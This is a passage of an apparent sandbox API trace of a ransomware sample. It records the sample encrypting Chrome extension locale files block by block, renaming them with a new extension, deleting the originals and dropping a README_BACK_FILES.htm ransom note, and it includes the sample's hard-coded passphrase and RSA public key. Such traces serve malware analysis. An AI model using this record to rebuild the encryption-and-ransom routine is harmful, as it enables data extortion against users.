lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.424] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.424] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.425] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.426] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.427] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.427] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.427] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x26b, lpOverlapped=0x0) returned 1 [0263.427] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x26b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0263.427] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0263.427] CloseHandle (hObject=0x5d60) returned 1 [0263.427] CloseHandle (hObject=0x5d5c) returned 1 [0263.427] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0263.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0263.430] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0263.431] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0263.432] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0263.432] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.432] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.432] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.432] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0263.433] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0263.433] AreFileApisANSI () returned 1 [0263.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.433] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.434] GetFileType (hFile=0x5d64) returned 0x1 [0263.434] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.435] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.435] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0263.435] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.435] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.435] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.435] GetLastError () returned 0x0 [0263.435] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json")) returned 0x20 [0263.436] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0263.436] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.437] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.446] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.446] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.448] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.448] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.448] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.448] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.448] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.449] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.449] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75990) returned 1 [0263.449] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75990, dwCertEncodingType=0x1, pInfo=0x2eadaa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadad0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadad8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e8c0) returned 1 [0263.449] CryptEncrypt (in: hKey=0x2e7e8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.449] CryptEncrypt (in: hKey=0x2e7e8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74918*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74918*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.449] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74918*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74918*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.451] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.460] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.460] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.469] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.470] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.470] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.470] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.470] WriteFile 